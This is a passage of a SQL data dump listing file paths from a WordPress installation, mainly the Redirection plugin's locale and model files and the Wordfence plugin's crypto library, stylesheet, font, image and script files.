,(804,'wp-content/plugins/redirection/locale/redirection-el.mo'),(805,'wp-content/plugins/redirection/locale/redirection-el.po'),(806,'wp-content/plugins/redirection/locale/redirection-en_AU.mo'),(807,'wp-content/plugins/redirection/locale/redirection-en_AU.po'),(808,'wp-content/plugins/redirection/locale/redirection-en_CA.mo'),(809,'wp-content/plugins/redirection/locale/redirection-en_CA.po'),(810,'wp-content/plugins/redirection/locale/redirection-en_GB.mo'),(811,'wp-content/plugins/redirection/locale/redirection-en_GB.po'),(812,'wp-content/plugins/redirection/locale/redirection-en_NZ.mo'),(813,'wp-content/plugins/redirection/locale/redirection-en_NZ.po'),(814,'wp-content/plugins/redirection/locale/redirection-en_ZA.mo'),(815,'wp-content/plugins/redirection/locale/redirection-en_ZA.po'),(816,'wp-content/plugins/redirection/locale/redirection-es_CO.mo'),(817,'wp-content/plugins/redirection/locale/redirection-es_CO.po'),(818,'wp-content/plugins/redirection/locale/redirection-es_EC.mo'),(819,'wp-content/plugins/redirection/locale/redirection-es_EC.po'),(820,'wp-content/plugins/redirection/locale/redirection-es_ES.mo'),(821,'wp-content/plugins/redirection/locale/redirection-es_ES.po'),(822,'wp-content/plugins/redirection/locale/redirection-es_MX.mo'),(823,'wp-content/plugins/redirection/locale/redirection-es_MX.po'),(824,'wp-content/plugins/redirection/locale/redirection-es_VE.mo'),(825,'wp-content/plugins/redirection/locale/redirection-es_VE.po'),(826,'wp-content/plugins/redirection/locale/redirection-fa_IR.mo'),(827,'wp-content/plugins/redirection/locale/redirection-fa_IR.po'),(828,'wp-content/plugins/redirection/locale/redirection-fr_CA.mo'),(829,'wp-content/plugins/redirection/locale/redirection-fr_CA.po'),(830,'wp-content/plugins/redirection/locale/redirection-fr_FR.mo'),(831,'wp-content/plugins/redirection/locale/redirection-fr_FR.po'),(832,'wp-content/plugins/redirection/locale/redirection-gl_ES.mo'),(833,'wp-content/plugins/redirection/locale/redirection-gl_ES.po'),(834,'wp-content/plugins/redirection/locale/redirection-hr.mo'),(835,'wp-content/plugins/redirection/locale/redirection-hr.po'),(836,'wp-content/plugins/redirection/locale/redirection-it_IT.mo'),(837,'wp-content/plugins/redirection/locale/redirection-it_IT.po'),(838,'wp-content/plugins/redirection/locale/redirection-ja.mo'),(839,'wp-content/plugins/redirection/locale/redirection-ja.po'),(840,'wp-content/plugins/redirection/locale/redirection-lv.mo'),(841,'wp-content/plugins/redirection/locale/redirection-lv.po'),(842,'wp-content/plugins/redirection/locale/redirection-nl_NL.mo'),(843,'wp-content/plugins/redirection/locale/redirection-nl_NL.po'),(844,'wp-content/plugins/redirection/locale/redirection-pt_BR.mo'),(845,'wp-content/plugins/redirection/locale/redirection-pt_BR.po'),(846,'wp-content/plugins/redirection/locale/redirection-ru_RU.mo'),(847,'wp-content/plugins/redirection/locale/redirection-ru_RU.po'),(848,'wp-content/plugins/redirection/locale/redirection-sv_SE.mo'),(849,'wp-content/plugins/redirection/locale/redirection-sv_SE.po'),(850,'wp-content/plugins/redirection/locale/redirection-zh_TW.mo'),(851,'wp-content/plugins/redirection/locale/redirection-zh_TW.po'),(852,'wp-content/plugins/redirection/locale/redirection.pot'),(853,'wp-content/plugins/redirection/matches/cookie.php'),(854,'wp-content/plugins/redirection/matches/custom-filter.php'),(855,'wp-content/plugins/redirection/matches/from-notfrom.php'),(856,'wp-content/plugins/redirection/matches/from-url.php'),(857,'wp-content/plugins/redirection/matches/http-header.php'),(858,'wp-content/plugins/redirection/matches/ip.php'),(859,'wp-content/plugins/redirection/matches/language.php'),(860,'wp-content/plugins/redirection/matches/login.php'),(861,'wp-content/plugins/redirection/matches/page.php'),(862,'wp-content/plugins/redirection/matches/referrer.php'),(863,'wp-content/plugins/redirection/matches/server.php'),(864,'wp-content/plugins/redirection/matches/url.php'),(865,'wp-content/plugins/redirection/matches/user-agent.php'),(866,'wp-content/plugins/redirection/matches/user-role.php'),(867,'wp-content/plugins/redirection/models/action.php'),(868,'wp-content/plugins/redirection/models/canonical.php'),(869,'wp-content/plugins/redirection/models/file-io.php'),(870,'wp-content/plugins/redirection/models/fixer.php'),(871,'wp-content/plugins/redirection/models/flusher.php'),(872,'wp-content/plugins/redirection/models/group.php'),(873,'wp-content/plugins/redirection/models/header.php'),(874,'wp-content/plugins/redirection/models/htaccess.php'),(875,'wp-content/plugins/redirection/models/importer.php'),(876,'wp-content/plugins/redirection/models/log/log-404.php'),(877,'wp-content/plugins/redirection/models/log/log-redirect.php'),(878,'wp-content/plugins/redirection/models/log/log.php'),(879,'wp-content/plugins/redirection/models/match.php'),(880,'wp-content/plugins/redirection/models/module.php'),(881,'wp-content/plugins/redirection/models/monitor.php'),(882,'wp-content/plugins/redirection/models/permalinks.php'),(883,'wp-content/plugins/redirection/models/redirect/redirect-cache.php'),(884,'wp-content/plugins/redirection/models/redirect/redirect-filter.php'),(885,'wp-content/plugins/redirection/models/redirect/redirect-options.php'),(886,'wp-content/plugins/redirection/models/redirect/redirect-sanitizer.php'),(887,'wp-content/plugins/redirection/models/redirect/redirect.php'),(888,'wp-content/plugins/redirection/models/regex.php'),(889,'wp-content/plugins/redirection/models/request.php'),(890,'wp-content/plugins/redirection/models/url/url-flags.php'),(891,'wp-content/plugins/redirection/models/url/url-match.php'),(892,'wp-content/plugins/redirection/models/url/url-path.php'),(893,'wp-content/plugins/redirection/models/url/url-query.php'),(894,'wp-content/plugins/redirection/models/url/url-request.php'),(895,'wp-content/plugins/redirection/models/url/url-transform.php'),(896,'wp-content/plugins/redirection/models/url/url.php'),(897,'wp-content/plugins/redirection/modules/apache.php'),(898,'wp-content/plugins/redirection/modules/nginx.php'),(899,'wp-content/plugins/redirection/modules/wordpress.php'),(900,'wp-content/plugins/redirection/readme.txt'),(901,'wp-content/plugins/redirection/redirection-admin.php'),(902,'wp-content/plugins/redirection/redirection-capabilities.php'),(903,'wp-content/plugins/redirection/redirection-cli.php'),(904,'wp-content/plugins/redirection/redirection-front.php'),(905,'wp-content/plugins/redirection/redirection-settings.php'),(906,'wp-content/plugins/redirection/redirection-strings.php'),(907,'wp-content/plugins/redirection/redirection-version.php'),(908,'wp-content/plugins/redirection/redirection.css'),(909,'wp-content/plugins/redirection/redirection.js'),(910,'wp-content/plugins/redirection/redirection.php'),(911,'wp-content/plugins/wordfence/crypto/vendor/autoload.php'),(912,'wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php'),(913,'wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php'),(914,'wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE'),(915,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php'),(916,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php'),(917,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php'),(918,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php'),(919,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php'),(920,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php'),(921,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.json'),(922,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.php'),(923,'wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php'),(924,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE'),(925,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey'),(926,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc'),(927,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php'),(928,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php'),(929,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php'),(930,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php'),(931,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php'),(932,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php'),(933,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php'),(934,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php'),(935,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php'),(936,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php'),(937,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php'),(938,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE'),(939,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php'),(940,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php'),(941,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php'),(942,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php'),(943,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php'),(944,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json'),(945,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php'),(946,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php'),(947,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php'),(948,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php'),(949,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php'),(950,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php'),(951,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php'),(952,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(953,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(954,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php'),(955,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(956,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(957,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(958,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(959,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(960,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(961,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php'),(962,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php'),(963,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php'),(964,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php'),(965,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php'),(966,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php'),(967,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php'),(968,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php'),(969,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php'),(970,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php'),(971,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php'),(972,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php'),(973,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php'),(974,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php'),(975,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php'),(976,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml'),(977,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml'),(978,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php'),(979,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php'),(980,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php'),(981,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php'),(982,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php'),(983,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php'),(984,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(985,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php'),(986,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php'),(987,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(988,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(989,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(990,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(991,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(992,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php'),(993,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php'),(994,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php'),(995,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php'),(996,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php'),(997,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php'),(998,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php'),(999,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php'),(1000,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php'),(1001,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php'),(1002,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php'),(1003,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php'),(1004,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php'),(1005,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php'),(1006,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php'),(1007,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(1008,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(1009,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php'),(1010,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php'),(1011,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(1012,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(1013,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(1014,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(1015,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(1016,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php'),(1017,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php'),(1018,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php'),(1019,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php'),(1020,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php'),(1021,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php'),(1022,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php'),(1023,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php'),(1024,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php'),(1025,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php'),(1026,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php'),(1027,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php'),(1028,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php'),(1029,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php'),(1030,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php'),(1031,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php'),(1032,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php'),(1033,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php'),(1034,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php'),(1035,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php'),(1036,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php'),(1037,'wp-content/plugins/wordfence/css/activity-report-widget.1647958122.css'),(1038,'wp-content/plugins/wordfence/css/diff.1647958122.css'),(1039,'wp-content/plugins/wordfence/css/dt_table.1647958122.css'),(1040,'wp-content/plugins/wordfence/css/fullLog.1647958122.css'),(1041,'wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png'),(1042,'wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png'),(1043,'wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png'),(1044,'wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png'),(1045,'wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png'),(1046,'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png'),(1047,'wp-content/plugins/wordfence/css/iptraf.1647958122.css'),(1048,'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1647958122.css'),(1049,'wp-content/plugins/wordfence/css/jquery-ui.min.1647958122.css'),(1050,'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1647958122.css'),(1051,'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1647958122.css'),(1052,'wp-content/plugins/wordfence/css/license/care-global.1647958122.css'),(1053,'wp-content/plugins/wordfence/css/license/care.1647958122.css'),(1054,'wp-content/plugins/wordfence/css/license/free-global.1647958122.css'),(1055,'wp-content/plugins/wordfence/css/license/free.1647958122.css'),(1056,'wp-content/plugins/wordfence/css/license/premium-global.1647958122.css'),(1057,'wp-content/plugins/wordfence/css/license/premium.1647958122.css'),(1058,'wp-content/plugins/wordfence/css/license/response-global.1647958122.css'),(1059,'wp-content/plugins/wordfence/css/license/response-variables.1647958122.css'),(1060,'wp-content/plugins/wordfence/css/license/response.1647958122.css'),(1061,'wp-content/plugins/wordfence/css/main.1647958122.css'),(1062,'wp-content/plugins/wordfence/css/phpinfo.1647958122.css'),(1063,'wp-content/plugins/wordfence/css/wf-adminbar.1647958122.css'),(1064,'wp-content/plugins/wordfence/css/wf-colorbox.1647958122.css'),(1065,'wp-content/plugins/wordfence/css/wf-font-awesome.1647958122.css'),(1066,'wp-content/plugins/wordfence/css/wf-global.1647958122.css'),(1067,'wp-content/plugins/wordfence/css/wf-ionicons.1647958122.css'),(1068,'wp-content/plugins/wordfence/css/wf-onboarding.1647958122.css'),(1069,'wp-content/plugins/wordfence/css/wf-roboto-font.1647958122.css'),(1070,'wp-content/plugins/wordfence/css/wfselect2.min.1647958122.css'),(1071,'wp-content/plugins/wordfence/css/wordfenceBox.1647958122.css'),(1072,'wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff'),(1073,'wp-content/plugins/wordfence/fonts/ionicons.woff'),(1074,'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff'),(1075,'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff'),(1076,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff'),(1077,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff'),(1078,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff'),(1079,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff'),(1080,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff'),(1081,'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff'),(1082,'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff'),(1083,'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff'),(1084,'wp-content/plugins/wordfence/images/2fa-whole.svg'),(1085,'wp-content/plugins/wordfence/images/2fa1.svg'),(1086,'wp-content/plugins/wordfence/images/2fa2.svg'),(1087,'wp-content/plugins/wordfence/images/back_disabled.jpg'),(1088,'wp-content/plugins/wordfence/images/back_enabled.jpg'),(1089,'wp-content/plugins/wordfence/images/blocking.svg'),(1090,'wp-content/plugins/wordfence/images/button-grad-grey.png'),(1091,'wp-content/plugins/wordfence/images/checkbox.png'),(1092,'wp-content/plugins/wordfence/images/flags.png'),(1093,'wp-content/plugins/wordfence/images/forward_disabled.jpg'),(1094,'wp-content/plugins/wordfence/images/forward_enabled.jpg'),(1095,'wp-content/plugins/wordfence/images/help.png'),(1096,'wp-content/plugins/wordfence/images/icons/ajax24.gif'),(1097,'wp-content/plugins/wordfence/images/icons/ajax3.gif'),(1098,'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif'),(1099,'wp-content/plugins/wordfence/images/icons/ajaxScan.gif'),(1100,'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif'),(1101,'wp-content/plugins/wordfence/images/icons/arrow_refresh.png'),(1102,'wp-content/plugins/wordfence/images/icons/bullet_yellow.png'),(1103,'wp-content/plugins/wordfence/images/icons/check-care.svg'),(1104,'wp-content/plugins/wordfence/images/icons/check-premium.svg'),(1105,'wp-content/plugins/wordfence/images/icons/check-response.svg'),(1106,'wp-content/plugins/wordfence/images/icons/check.svg'),(1107,'wp-content/plugins/wordfence/images/icons/email_go.png'),(1108,'wp-content/plugins/wordfence/images/icons/error128.png'),(1109,'wp-content/plugins/wordfence/images/icons/magnifier.png'),(1110,'wp-content/plugins/wordfence/images/icons/tick128.png'),(1111,'wp-content/plugins/wordfence/images/icons/warning128.png'),(1112,'wp-content/plugins/wordfence/images/icons/working-indicator.gif'),(1113,'wp-content/plugins/wordfence/images/lightbox-controls.png'),(1114,'wp-content/plugins/wordfence/images/loading.gif'),(1115,'wp-content/plugins/wordfence/images/loading_background.png'),(1116,'wp-content/plugins/wordfence/images/loading_large.gif'),(1117,'wp-content/plugins/wordfence/images/logo.png'),(1118,'wp-content/plugins/wordfence/images/logos/shield-care.svg'),(1119,'wp-content/plugins/wordfence/images/logos/shield-free.svg'),(1120,'wp-content/plugins/wordfence/images/logos/shield-premium.svg'),(1121,'wp-content/plugins/wordfence/images/logos/shield-response.svg'),(1122,'wp-content/plugins/wordfence/images/logos/shield-white.svg'),(1123,'wp-content/plugins/wordfence/images/options.svg'),(1124,'wp-content/plugins/wordfence/images/ratelimiting.svg'),(1125,'wp-content/plugins/wordfence/images/sort_asc.gif'),(1126,'wp-content/plugins/wordfence/images/sort_asc.png'),(1127,'wp-content/plugins/wordfence/images/sort_asc_disabled.gif'),(1128,'wp-content/plugins/wordfence/images/sort_asc_disabled.png'),(1129,'wp-content/plugins/wordfence/images/sort_both.gif'),(1130,'wp-content/plugins/wordfence/images/sort_both.png'),(1131,'wp-content/plugins/wordfence/images/sort_desc.gif'),(1132,'wp-content/plugins/wordfence/images/sort_desc.png'),(1133,'wp-content/plugins/wordfence/images/sort_desc_disabled.gif'),(1134,'wp-content/plugins/wordfence/images/sort_desc_disabled.png'),(1135,'wp-content/plugins/wordfence/images/support.svg'),(1136,'wp-content/plugins/wordfence/images/tools.svg'),(1137,'wp-content/plugins/wordfence/images/wf-central-logo.svg'),(1138,'wp-content/plugins/wordfence/images/wf-error-badge.svg'),(1139,'wp-content/plugins/wordfence/images/wf-horizontal.svg'),(1140,'wp-content/plugins/wordfence/images/wordfence-logo.svg'),(1141,'wp-content/plugins/wordfence/index.php'),(1142,'wp-content/plugins/wordfence/js/Chart.bundle.min.1647958122.js'),(1143,'wp-content/plugins/wordfence/js/admin.1647958122.js'),(1144,'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1647958122.js'),(1145,'wp-content/plugins/wordfence/js/admin.liveTraffic.1647958122.js'),(1146,'wp-content/plugins/wordfence/js/date.1647958122.js'),(1147,'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1647958122.js'),(1148,'wp-content/plugins/wordfence/js/jquery.colorbox-min.1647958122.js'),(1149,'wp-content/plugins/wordfence/js/jquery.colorbox.1647958122.js'),(1150,'wp-content/plugins/wordfence/js/jquery.dataTables.min.1647958122.js'),(1151,'wp-content/plugins/wordfence/js/jquery.qrcode.min.1647958122.js'),(1152,'wp-content/plugins/wordfence/js/jquery.tmpl.min.1647958122.js'),(1153,'wp-content/plugins/wordfence/js/jquery.tools.min.1647958122.js'),(1154,'wp-content/plugins/wordfence/js/knockout-3.5.1.1647958122.js'),(1155,'wp-content/plugins/wordfence/js/wfdashboard.1647958122.js'),(1156,'wp-content/plugins/wordfence/js/wfdropdown.1647958122.js'),(1157,'wp-content/plugins/wordfence/js/wfglobal.1647958122.js'),(1158,'wp-content/plugins/wordfence/js/wfi18n.1647958122.js'),(1159,'wp-content/plugins/wordfence/js/wfpopover.1647958122.js'),(1160,'wp-content/plugins/wordfence/js/wfselect2.min.1647958122.js'),(1161,'wp-content/plugins/wordfence/languages/wordfence.mo'),(1162,'wp-content/plugins/wordfence/languages/wordfence.po'),(1163,'wp-content/plugins/wordfence/lib/.htaccess'),(1164,'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php'),(1165,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php'),(1166,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php'),(1167,'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php'),(1168,'wp-content/plugins/wordfence/lib/Diff.php'),(1169,'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb'),(1170,'wp-content/plugins/wordfence/lib/IPTraf.php'),(1171,'wp-content/plugins/wordfence/lib/IPTrafList.php'),(1172,'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php'),(1173,'wp-content/plugins/wordfence/lib/compat.php'),(1174,'wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php'),(1175,'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php'),(1176,'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php'),(1177,'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php'),(1178,'wp-content/plugins/wordfence/lib/dashboard/widget_ips.php'),(1179,'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php'),(1180,'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php'),(1181,'wp-content/plugins/wordfenc